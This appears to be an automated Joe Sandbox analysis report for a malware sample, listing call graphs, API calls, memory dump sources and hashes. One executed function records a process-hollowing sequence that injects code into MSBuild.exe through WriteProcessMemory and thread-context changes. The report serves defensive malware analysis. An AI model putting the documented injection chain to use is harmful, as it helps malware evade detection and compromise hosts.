20880->20882 20883 8ac424 WriteProcessMemory 20880->20883 20881->20876 20883->20880 20969 87a590 48 API calls 20890 882e90 79 API calls 20971 8733a0 14 API calls 20973 8881a3 75 API calls 20974 890fa7 FreeLibrary 20976 8847bb GetModuleHandleW GetProcAddress GetProcAddress 20977 884bbb GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 20978 891dbc GetProcessHeap 20982 87adb0 29 API calls std::_Throw_Cpp_error 20898 8810b0 32 API calls std::_Throw_Cpp_error 20984 882db0 78 API calls _Yarn 20985 8853b1 8 API calls 20900 882cc8 45 API calls 2 library calls 20902 8906cd 16 API calls __dosmaperr 20989 87a7c0 134 API calls 20990 891dce 34 API calls 2 library calls 20910 887ad4 82 API calls 2 library calls 20996 88cfd5 7 API calls 20997 893bd7 52 API calls 2 library calls 20913 871ae0 6 API calls __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 21000 87a5e0 70 API calls __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 21001 8769e0 5 API calls 2 library calls 21003 882fe1 75 API calls 21004 89f1e5 IsProcessorFeaturePresent 20917 89b6f5 58 API calls 20918 887a0c 15 API calls 2 library calls 20919 895c0c 51 API calls 3 library calls 20922 87a800 50 API calls 21006 87cf00 71 API calls 21007 881100 57 API calls 2 library calls 20926 89e81f 20 API calls 21010 875510 104 API calls 3 library calls 21011 87ad10 48 API calls 21012 882b29 47 API calls 2 library calls 20933 88182a 16 API calls 2 library calls 21013 887b2c GetCommandLineA GetCommandLineW 21014 895d2c 50 API calls 3 library calls 20935 88302f 77 API calls 20939 885223 54 API calls 2 library calls 20940 884a27 30 API calls 20727 884a39 20728 884a45 ___scrt_is_nonwritable_in_current_image 20727->20728 20753 8813e2 20728->20753 20730 884a4c 20731 884ba5 20730->20731 20741 884a76 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 20730->20741 20779 884073 4 API calls 2 library calls 20731->20779 20733 884bac 20780 88a4bd 21 API calls CallUnexpected 20733->20780 20735 884bb2 20781 88a4d3 21 API calls CallUnexpected 20735->20781 20737 884bba 20738 884a95 20739 884b16 20764 88ca3c 20739->20764 20741->20738 20741->20739 20775 88a507 48 API calls 4 library calls 20741->20775 20743 884b1c 20768 871c00 20743->20768 20747 884b3d 20747->20733 20748 884b41 20747->20748 20749 884b4a 20748->20749 20777 88a4e9 21 API calls CallUnexpected 20748->20777 20778 88141b 79 API calls ___scrt_uninitialize_crt 20749->20778 20752 884b53 20752->20738 20754 8813eb 20753->20754 20782 883cdf IsProcessorFeaturePresent 20754->20782 20756 8813f7 20783 8853c5 10 API calls 2 library calls 20756->20783 20758 8813fc 20759 881400 20758->20759 20784 8878ff 20758->20784 20759->20730 20762 881417 20762->20730 20765 88ca4a 20764->20765 20766 88ca45 20764->20766 20765->20743 20797 88cb65 68 API calls 20766->20797 20798 872620 20768->20798 20772 871c3a 20773 8811f9 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20772->20773 20774 871c73 20773->20774 20776 884020 GetModuleHandleW 20774->20776 20775->20739 20776->20747 20777->20749 20778->20752 20779->20733 20780->20735 20781->20737 20782->20756 20783->20758 20788 8927a5 20784->20788 20787 8853e4 7 API calls 2 library calls 20787->20759 20789 8927b5 20788->20789 20790 881409 20788->20790 20789->20790 20792 891f19 20789->20792 20790->20762 20790->20787 20793 891f20 20792->20793 20794 891f63 GetStdHandle 20793->20794 20795 891fc5 20793->20795 20796 891f76 GetFileType 20793->20796 20794->20793 20795->20789 20796->20793 20797->20765 20799 87264c 20798->20799 20806 87a1f0 20799->20806 20802 872670 20803 872684 20802->20803 20804 872698 20803->20804 20874 87b2c0 40 API calls Concurrency::cancel_current_task 20803->20874 20804->20772 20815 87a330 20806->20815 20810 87a232 20831 87a3c0 20810->20831 20812 87a248 20813 8811f9 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20812->20813 20814 871c32 20813->20814 20814->20802 20837 880eb0 20815->20837 20818 8811f9 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20819 87a21d 20818->20819 20820 87a2a0 20819->20820 20821 87a2fb 20820->20821 20822 87a2bb 20820->20822 20823 881185 std::ios_base::_Init 16 API calls 20821->20823 20822->20821 20824 87a2cc 20822->20824 20825 87a30c 20823->20825 20846 881185 20824->20846 20859 87a490 144 API calls __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 20825->20859 20828 87a2ed 20828->20810 20832 87a3d4 20831->20832 20833 87a3e8 20832->20833 20872 87b2c0 40 API calls Concurrency::cancel_current_task 20832->20872 20835 87a401 20833->20835 20873 87b2c0 40 API calls Concurrency::cancel_current_task 20833->20873 20835->20812 20842 880f00 20837->20842 20840 8811f9 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20841 87a35d 20840->20841 20841->20818 20843 880f29 20842->20843 20844 8811f9 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 20843->20844 20845 880ee0 20844->20845 20845->20840 20848 88118a 20846->20848 20849 87a2dd 20848->20849 20851 8811a6 20848->20851 20860 88e3ac 20848->20860 20867 88a7ef EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20848->20867 20858 87a450 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20849->20858 20852 883ac2 std::ios_base::_Init 20851->20852 20853 8811b0 Concurrency::cancel_current_task 20851->20853 20869 884d23 RaiseException 20852->20869 20868 884d23 RaiseException 20853->20868 20856 883ade 20857 881ccf 20858->20828 20859->20828 20866 8904c1 _unexpected 20860->20866 20861 8904ff 20871 88c664 14 API calls __dosmaperr 20861->20871 20862 8904ea RtlAllocateHeap 20864 8904fd 20862->20864 20862->20866 20864->20848 20866->20861 20866->20862 20870 88a7ef EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20866->20870 20867->20848 20868->20857 20869->20856 20870->20866 20871->20864 21019 88113a 87 API calls std::_Throw_Cpp_error 20941 88323e 81 API calls messages 20943 891e37 15 API calls 20948 885440 49 API calls 5 library calls 21024 881942 9 API calls 3 library calls 20951 882a5a 31 API calls 21028 89595a 53 API calls 3 library calls 20952 872450 112 API calls 21029 874950 107 API calls __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 21030 87cf50 143 API calls 3 library calls 21032 884355 DecodePointer 21033 88f557 55 API calls 2 library calls 20954 88306b 77 API calls 20956 873260 30 API calls 20957 876860 58 API calls __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 20958 87be60 71 API calls 20960 89507d 50 API calls 4 library calls 21041 89237c LeaveCriticalSection std::_Lockit::~_Lockit 21044 884974 80 API calls 2 library calls 21045 884b74 21 API calls CallUnexpected

                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                          Function 008AC19E Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 295threadinjectionmemoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,008AC110,008AC100), ref: 008AC334
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 008AC347
                                                                                                                                                                                                                                                                          • Wow64GetThreadContext.KERNEL32(0000015C,00000000), ref: 008AC365
                                                                                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(00000160,?,008AC154,00000004,00000000), ref: 008AC389
                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(00000160,?,?,00003000,00000040), ref: 008AC3B4
                                                                                                                                                                                                                                                                          • TerminateProcess.KERNELBASE(00000160,00000000), ref: 008AC3D3
                                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(00000160,00000000,?,?,00000000,?), ref: 008AC40C
                                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(00000160,00400000,?,?,00000000,?,00000028), ref: 008AC457
                                                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(00000160,?,?,00000004,00000000), ref: 008AC495
                                                                                                                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(0000015C,00860000), ref: 008AC4D1
                                                                                                                                                                                                                                                                          • ResumeThread.KERNELBASE(0000015C), ref: 008AC4E0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                                                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                                                          • API String ID: 2440066154-3857624555
                                                                                                                                                                                                                                                                          • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                                          • Instruction ID: 53cd534a0cd211e13335d22cdf7a44973073bee7827ecab4e7dedcacad932fba
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65B1F67264024AAFDB60CF68CC80BDAB3A5FF89714F158124EA08EB741D774FA51CB94
                                                                                                                                                                                                                                                                          Function 00871870 Relevance: 9.2, APIs: 6, Instructions: 162fileCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1378416451-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1a5fb7a751e4f6b806cbfd7930f3d9dcb982825c2729079abbe781554af49628
                                                                                                                                                                                                                                                                          • Instruction ID: 7a13ff80895e2b6a7bde2d1b6f9783480a1c6e825921638a39a22a19c4507510
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a5fb7a751e4f6b806cbfd7930f3d9dcb982825c2729079abbe781554af49628
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3719AB4D042488FDB04EFA8D59879DBBF0FF48304F10842AE899EB794D734A949CB52
                                                                                                                                                                                                                                                                          Function 00877D50 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 477COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 59 877d50-877db5 60 877df0-877e13 call 8760a0 59->60 61 877dbb-877dcc 59->61 66 877e2a-877e42 60->66 67 877e19-877e25 60->67 62 877de4-877dea 61->62 63 877dd2-877dde 61->63 62->60 63->62 69 877e9b 66->69 70 877e48-877e58 66->70 68 877ea0-877fe0 call 88e850 call 88e384 call 88e850 call 873fa0 call 8760c0 call 873fd0 call 8761d0 call 876270 call 876230 call 873fa0 call 876290 call 873fd0 call 8763a0 call 8763d0 67->68 102 877fe6-878011 call 878910 call 876270 68->102 103 878013-87801a 68->103 69->68 70->69 72 877e5e-877e6f 70->72 74 877e75-877e86 72->74 75 877e8c-877e95 72->75 74->69 74->75 75->69 102->103 104 878141-87815a call 871d90 call 876500 103->104 105 878020-878029 103->105 120 878176-878180 104->120 121 878160-878170 call 876500 104->121 107 878040-878046 105->107 108 87802f-87803b 105->108 112 87804c-87806c call 876270 107->112 108->112 119 878072-878086 112->119 122 8780c7-8780cf 119->122 123 87808c-8780a1 119->123 125 878196-8781b0 call 8760a0 120->125 121->120 138 878185-878190 call 876500 121->138 129 8780d5-87813c 122->129 130 8780da-878122 call 8763f0 122->130 123->122 127 8780a7-8780c1 123->127 136 8781b6-8781c0 125->136 137 8782a1-8782ab 125->137 127->122 129->104 139 878137 130->139 140 878128-878131 130->140 136->137 141 8781c6-87829c call 876520 call 876270 call 8765a0 136->141 142 8782b1-878399 call 876270 call 8765a0 call 876520 137->142 143 87839e-878424 call 876270 call 8765a0 137->143 138->125 139->119 140->139 162 87842c-8784a2 call 876270 call 8765a0 141->162 159 878427 142->159 143->159 159->162 167 8784a7-87854c call 876630 call 876520 call 871e40 * 2 call 8811f9 162->167
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _strcspn
                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                          • API String ID: 3709121408-2766056989
                                                                                                                                                                                                                                                                          • Opcode ID: 0c0c8cfd04163be98a3ddeb29c4910886366f96bc36473e7769ae102ff3bda12
                                                                                                                                                                                                                                                                          • Instruction ID: b452455db2e0b8ffe328b497ac1c81f7273d8e7aec0bca7ab0408f2e635428c4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c0c8cfd04163be98a3ddeb29c4910886366f96bc36473e7769ae102ff3bda12
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC32B4B4904669CFCB24DF68C981A9DBBF1FF49300F05859AE84DA7305E734AA85CF52
                                                                                                                                                                                                                                                                          Function 00871710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ConsoleFreeProtectVirtual
                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                          • API String ID: 621788221-2766056989
                                                                                                                                                                                                                                                                          • Opcode ID: aa27cdf6789b68c56003f1e843612b8b590ba95354b31d6fb79fe17e8ebd4e56
                                                                                                                                                                                                                                                                          • Instruction ID: bfc3746abc532cd822754c32606c506401ad739eefe9923388f39b1937903069
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa27cdf6789b68c56003f1e843612b8b590ba95354b31d6fb79fe17e8ebd4e56
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3841AEB0D05208DFDB04EFA9E88869EBBF0FF48344F118829E458AB351D775A944CF96
                                                                                                                                                                                                                                                                          Function 00871C00 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 194 871c00-871c43 call 872620 call 872670 199 871c51-871c7a call 8726b0 call 8811f9 194->199
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: EqualPrefix
                                                                                                                                                                                                                                                                          • String ID: @Ju
                                                                                                                                                                                                                                                                          • API String ID: 447727826-501080590
                                                                                                                                                                                                                                                                          • Opcode ID: c896bbb809726ccfc3fb372ed5d8ffcbe8c71f244fff171d77eeff2f2d5ba7bd
                                                                                                                                                                                                                                                                          • Instruction ID: 152541273768f68b17eba0afa43387173f17504bf4710f8bd2f4e8748a578276
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c896bbb809726ccfc3fb372ed5d8ffcbe8c71f244fff171d77eeff2f2d5ba7bd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF01E4749002089FCB00FFA8D9597AEBBF4FF14304F408469E459E7351EB74AA08CB92
                                                                                                                                                                                                                                                                          Function 00897FBC Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 204 897fbc-897fde 205 8981d1 204->205 206 897fe4-897fe6 204->206 209 8981d3-8981d7 205->209 207 897fe8-898007 call 88cef8 206->207 208 898012-898035 206->208 215 89800a-89800d 207->215 211 89803b-898041 208->211 212 898037-898039 208->212 211->207 214 898043-898054 211->214 212->211 212->214 216 898067-898077 call 8982e9 214->216 217 898056-898064 call 896d6c 214->217 215->209 222 898079-89807f 216->222 223 8980c0-8980d2 216->223 217->216 224 8980a8-8980be call 898366 222->224 225 898081-898084 222->225 226 898129-898149 WriteFile 223->226 227 8980d4-8980da 223->227 245 8980a1-8980a3 224->245 228 89808f-89809e call 89872d 225->228 229 898086-898089 225->229 231 89814b-898151 GetLastError 226->231 232 898154 226->232 233 8980dc-8980df 227->233 234 898115-898122 call 898795 227->234 228->245 229->228 235 898169-89816c 229->235 231->232 239 898157-898162 232->239 240 898101-898113 call 898959 233->240 241 8980e1-8980e4 233->241 244 898127 234->244 248 89816f-898171 235->248 246 8981cc-8981cf 239->246 247 898164-898167 239->247 251 8980fc-8980ff 240->251 241->248 249 8980ea-8980f7 call 898870 241->249 244->251 245->239 246->209 247->235 252 89819f-8981ab 248->252 253 898173-898178 248->253 249->251 251->245 255 8981ad-8981b3 252->255 256 8981b5-8981c7 252->256 257 89817a-89818c 253->257 258 898191-89819a call 88c6f0 253->258 255->205 255->256 256->215 257->215 258->215
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00898366: GetConsoleOutputCP.KERNEL32(A9416E27,00000000,00000000,?), ref: 008983C9
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00888191,?,008883F3), ref: 00898141
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00888191,?,008883F3,?,008883F3,?,?,?,?,?,?,?,?,?,?), ref: 0089814B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2915228174-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5b01642e4f222efe2d1c3c1cebd53c63d94003485ec9cfb1378bfc583a78803a
                                                                                                                                                                                                                                                                          • Instruction ID: e51b7659184716c0789782dcc9924d7bd420a3d263a9316f1b7875be0e49f2f5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b01642e4f222efe2d1c3c1cebd53c63d94003485ec9cfb1378bfc583a78803a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D061917190411AEFDF15EFA8CC45AAEBBB9FF0A308F180155E904E7212DB32D905CBA1
                                                                                                                                                                                                                                                                          Function 00898795 Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 261 898795-8987ea call 884790 264 8987ec 261->264 265 89885f-89886f call 8811f9 261->265 267 8987f2 264->267 269 8987f8-8987fa 267->269 270 8987fc-898801 269->270 271 898814-898839 WriteFile 269->271 272 89880a-898812 270->272 273 898803-898809 270->273 274 89883b-898846 271->274 275 898857-89885d GetLastError 271->275 272->269 272->271 273->272 274->265 276 898848-898853 274->276 275->265 276->267 277 898855 276->277 277->265
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00898127,?,008883F3,?,?,?,00000000), ref: 00898831
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00898127,?,008883F3,?,?,?,00000000,?,?,?,?,?,00888191,?,008883F3), ref: 00898857
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
